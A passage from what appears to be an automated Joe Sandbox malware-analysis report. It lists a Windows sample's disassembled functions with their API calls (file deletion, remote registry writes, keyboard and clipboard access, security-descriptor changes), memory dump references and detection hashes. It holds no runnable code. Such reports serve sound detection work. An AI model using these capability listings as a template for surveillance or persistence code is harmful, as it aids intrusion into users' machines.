                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012C844
                                                        • __swprintf.LIBCMT ref: 0012C890
                                                        • __swprintf.LIBCMT ref: 0012C8D3
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • __swprintf.LIBCMT ref: 0012C927
                                                          • Part of subcall function 000E3698: __woutput_l.LIBCMT ref: 000E36F1
                                                        • __swprintf.LIBCMT ref: 0012C975
                                                          • Part of subcall function 000E3698: __flsbuf.LIBCMT ref: 000E3713
                                                          • Part of subcall function 000E3698: __flsbuf.LIBCMT ref: 000E372B
                                                        • __swprintf.LIBCMT ref: 0012C9C4
                                                        • __swprintf.LIBCMT ref: 0012CA13
                                                        • __swprintf.LIBCMT ref: 0012CA62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: a2b57908084623ac2e6c66dc12987bbee021d07535760ec9d1eb86e07a652a10
                                                        • Instruction ID: 78ef74e23185186b48e55cde97de7d5a641753c80ecfa7c193258cf9a20eef04
                                                        • Opcode Fuzzy Hash: a2b57908084623ac2e6c66dc12987bbee021d07535760ec9d1eb86e07a652a10
                                                        • Instruction Fuzzy Hash: B2A10CB1404344ABC714EBA4D889EAFB7ECEF95704F40491DF59587192EB30DA48CB62
                                                        Function 0012EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0012EFB6
                                                        • _wcscmp.LIBCMT ref: 0012EFCB
                                                        • _wcscmp.LIBCMT ref: 0012EFE2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0012EFF4
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0012F00E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0012F026
                                                        • FindClose.KERNEL32(00000000), ref: 0012F031
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0012F04D
                                                        • _wcscmp.LIBCMT ref: 0012F074
                                                        • _wcscmp.LIBCMT ref: 0012F08B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012F09D
                                                        • SetCurrentDirectoryW.KERNEL32(00178920), ref: 0012F0BB
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012F0C5
                                                        • FindClose.KERNEL32(00000000), ref: 0012F0D2
                                                        • FindClose.KERNEL32(00000000), ref: 0012F0E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: f9884a471d4f73a15572150426133a3f6bef2b2701188e75d5162b4f9e29b34b
                                                        • Instruction ID: 737a073e6032ac9260cf8a9da054b5a9b23bc4ddbc11317f9b4bc55ec8541786
                                                        • Opcode Fuzzy Hash: f9884a471d4f73a15572150426133a3f6bef2b2701188e75d5162b4f9e29b34b
                                                        • Instruction Fuzzy Hash: 6D31E3365002286FDB149FA4EC48EEE77BDEF49360F104179F904E31A1EB70DA92CA65
                                                        Function 00140857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00140953
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0014F910,00000000,?,00000000,?,?), ref: 001409C1
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00140A09
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00140A92
                                                        • RegCloseKey.ADVAPI32(?), ref: 00140DB2
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00140DBF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 75a172e78a5eca3b7a53f4cffc66c4078873267e5d64db0a64b313843346b208
                                                        • Instruction ID: 21fcaaf412750434ffe7ea9a67e07c2d12b7dcce3e19362c7674846e5c38b2e5
                                                        • Opcode Fuzzy Hash: 75a172e78a5eca3b7a53f4cffc66c4078873267e5d64db0a64b313843346b208
                                                        • Instruction Fuzzy Hash: 6A0259756006119FCB15EF25C885E6AB7E5FF89714F04885DF98A9B3A2CB30EC45CB81
                                                        Function 0012F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0012F113
                                                        • _wcscmp.LIBCMT ref: 0012F128
                                                        • _wcscmp.LIBCMT ref: 0012F13F
                                                          • Part of subcall function 00124385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001243A0
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0012F16E
                                                        • FindClose.KERNEL32(00000000), ref: 0012F179
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0012F195
                                                        • _wcscmp.LIBCMT ref: 0012F1BC
                                                        • _wcscmp.LIBCMT ref: 0012F1D3
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012F1E5
                                                        • SetCurrentDirectoryW.KERNEL32(00178920), ref: 0012F203
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012F20D
                                                        • FindClose.KERNEL32(00000000), ref: 0012F21A
                                                        • FindClose.KERNEL32(00000000), ref: 0012F22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: d8a47f378c8bdc207ea7fb1ac36795a407bba72190f55f6aec212a3b3afeb3ef
                                                        • Instruction ID: f5b02347b8adc8e9809a398e8b41c1ad17054c6d0fe2491ab32efc922e344863
                                                        • Opcode Fuzzy Hash: d8a47f378c8bdc207ea7fb1ac36795a407bba72190f55f6aec212a3b3afeb3ef
                                                        • Instruction Fuzzy Hash: 6831E73A500629AEDB149F64FC49EEE77BC9F46360F100179E914E32A1DB30DEA6CE54
                                                        Function 0012A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0012A20F
                                                        • __swprintf.LIBCMT ref: 0012A231
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0012A26E
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0012A293
                                                        • _memset.LIBCMT ref: 0012A2B2
                                                        • _wcsncpy.LIBCMT ref: 0012A2EE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0012A323
                                                        • CloseHandle.KERNEL32(00000000), ref: 0012A32E
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0012A337
                                                        • CloseHandle.KERNEL32(00000000), ref: 0012A341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: 891e64457d7313c225e934219d9d2576e5b45cd1eb664a6c1630c6a3a36165e2
                                                        • Instruction ID: 17d05c7fd6ea38910e076816815e5c48b26c79e0d3f7d1a551b9793c2c239ccb
                                                        • Opcode Fuzzy Hash: 891e64457d7313c225e934219d9d2576e5b45cd1eb664a6c1630c6a3a36165e2
                                                        • Instruction Fuzzy Hash: 5C31E675904119ABDB20DFA0DC49FEB37BCFF89700F5040BAF508D2161E77096958B65
                                                        Function 00117CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00118202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0011821E
                                                          • Part of subcall function 00118202: GetLastError.KERNEL32(?,00117CE2,?,?,?), ref: 00118228
                                                          • Part of subcall function 00118202: GetProcessHeap.KERNEL32(00000008,?,?,00117CE2,?,?,?), ref: 00118237
                                                          • Part of subcall function 00118202: HeapAlloc.KERNEL32(00000000,?,00117CE2,?,?,?), ref: 0011823E
                                                          • Part of subcall function 00118202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00118255
                                                          • Part of subcall function 0011829F: GetProcessHeap.KERNEL32(00000008,00117CF8,00000000,00000000,?,00117CF8,?), ref: 001182AB
                                                          • Part of subcall function 0011829F: HeapAlloc.KERNEL32(00000000,?,00117CF8,?), ref: 001182B2
                                                          • Part of subcall function 0011829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00117CF8,?), ref: 001182C3
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00117D13
                                                        • _memset.LIBCMT ref: 00117D28
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00117D47
                                                        • GetLengthSid.ADVAPI32(?), ref: 00117D58
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00117D95
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00117DB1
                                                        • GetLengthSid.ADVAPI32(?), ref: 00117DCE
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00117DDD
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00117DE4
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00117E05
                                                        • CopySid.ADVAPI32(00000000), ref: 00117E0C
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00117E3D
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00117E63
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00117E77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 18338173d9fdd7cdc922155190a0735a84b22871e3597e335d8e6d50d92eb4c0
                                                        • Instruction ID: 573cb61696e722c3f550025e29db315d1beb3cb31f870e0ab2e9a617fa30679c
                                                        • Opcode Fuzzy Hash: 18338173d9fdd7cdc922155190a0735a84b22871e3597e335d8e6d50d92eb4c0
                                                        • Instruction Fuzzy Hash: 45616C75904209AFDF04CFA0DC44AEEBBBAFF45300F148169F815A72A1DB319A86CB60
                                                        Function 000D66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                        • API String ID: 0-1710143159
                                                        • Opcode ID: d0903400e819e0e3471361d899b7c93dca07bda20fc3e7039be13afd7ee319ef
                                                        • Instruction ID: bf5fa84858035239275b00af70d2ea150b5a0439d2430f0d9775cc15810df643
                                                        • Opcode Fuzzy Hash: d0903400e819e0e3471361d899b7c93dca07bda20fc3e7039be13afd7ee319ef
                                                        • Instruction Fuzzy Hash: E1726E75E003199BDB28CF58C8407EEB7B5FF48710F14816AE949EB391EB719981CBA0
                                                        Function 0012001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00120097
                                                        • SetKeyboardState.USER32(?), ref: 00120102
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00120122
                                                        • GetKeyState.USER32(000000A0), ref: 00120139
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00120168
                                                        • GetKeyState.USER32(000000A1), ref: 00120179
                                                        • GetAsyncKeyState.USER32(00000011), ref: 001201A5
                                                        • GetKeyState.USER32(00000011), ref: 001201B3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 001201DC
                                                        • GetKeyState.USER32(00000012), ref: 001201EA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00120213
                                                        • GetKeyState.USER32(0000005B), ref: 00120221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: e8fe669c40f60f61e5554bf30b70e5dfcfdde88eb6e33d9aeabb77af3b14cf07
                                                        • Instruction ID: b8d0599f13ca74b93185595a00ec34c720ad3029b0edf246d2e2410104132b76
                                                        • Opcode Fuzzy Hash: e8fe669c40f60f61e5554bf30b70e5dfcfdde88eb6e33d9aeabb77af3b14cf07
                                                        • Instruction Fuzzy Hash: 1A512C309043A829FB36DBA0A8547EABFB49F15380F08479ED9C15A5C3DB64DB9CC761
                                                        Function 001403DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001404AC
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0014054B
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001405E3
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00140822
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0014082F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 39c074b8d75c45bbfd693ef8985e1e7f82ef4008724b9e9e32688c8dfe3a7d49
                                                        • Instruction ID: 18d18e6ff316a0ae2a9d85b33047731451e1e97e26fef68a8441e908660f7f5b
                                                        • Opcode Fuzzy Hash: 39c074b8d75c45bbfd693ef8985e1e7f82ef4008724b9e9e32688c8dfe3a7d49
                                                        • Instruction Fuzzy Hash: 12E17D31604200AFCB15DF29C885E6ABBE5FF89714F04856DF94ADB262DB30EC41CB92
                                                        Function 00134164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 7ee0b1bd5271f8bd52f0d6372f2e8903a2889b09645b3757e96be4e9e9ceb84b
                                                        • Instruction ID: 6c3e668ef7f1261fe50b9d83a8cd76dd90b0d938e0df2656d4152267193aa9f1
                                                        • Opcode Fuzzy Hash: 7ee0b1bd5271f8bd52f0d6372f2e8903a2889b09645b3757e96be4e9e9ceb84b
                                                        • Instruction Fuzzy Hash: 042180396006109FDB14AF24EC09F6E7BA9EF15751F118029F9459B3B1DB70BD81CB54
                                                        Function 001237EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                          • Part of subcall function 00124A31: GetFileAttributesW.KERNEL32(?,0012370B), ref: 00124A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 001238A3
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0012394B
                                                        • MoveFileW.KERNEL32(?,?), ref: 0012395E
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0012397B
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012399D
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 001239B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: 9b3885dd099ff7ebb64d797f8d8dc2aab5552c89e785a292734463edded911db
                                                        • Instruction ID: 2d6131705638273813b34b29ce650a801f3e4c81a9fa4e55a0acf7b823502173
                                                        • Opcode Fuzzy Hash: 9b3885dd099ff7ebb64d797f8d8dc2aab5552c89e785a292734463edded911db
                                                        • Instruction Fuzzy Hash: DE51A03180415CAACF05EBA0EA92EEDB779AF15304F60016DF416B7192EF356F49CB60
                                                        Function 0012F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0012F440
                                                        • Sleep.KERNEL32(0000000A), ref: 0012F470
                                                        • _wcscmp.LIBCMT ref: 0012F484
                                                        • _wcscmp.LIBCMT ref: 0012F49F
                                                        • FindNextFileW.KERNEL32(?,?), ref: 0012F53D
                                                        • FindClose.KERNEL32(00000000), ref: 0012F553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 6d465f755f312bad07417240a432ea9a2f305471056997ac42aa3af4acfb26f5
                                                        • Instruction ID: 7092b49ea8ee9234017ac2638bcd7b0fd9f95d861864444316615acce71c3d90
                                                        • Opcode Fuzzy Hash: 6d465f755f312bad07417240a432ea9a2f305471056997ac42aa3af4acfb26f5
                                                        • Instruction Fuzzy Hash: C7416B7190025A9FCF14EF64EC49AEEBBB4FF15310F10447AE819A32A1DB309A96CF50
                                                        Function 000D3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID: 3c$_
                                                        • API String ID: 674341424-867841958
                                                        • Opcode ID: e10290a7f922d39205cade4bf69014416e59105877134af0e30b7fe9270bf919
                                                        • Instruction ID: 84ed1831b8629f6b5276daf64ee065d73b29300bf2cb04cc1db60d5a5b41954b
                                                        • Opcode Fuzzy Hash: e10290a7f922d39205cade4bf69014416e59105877134af0e30b7fe9270bf919
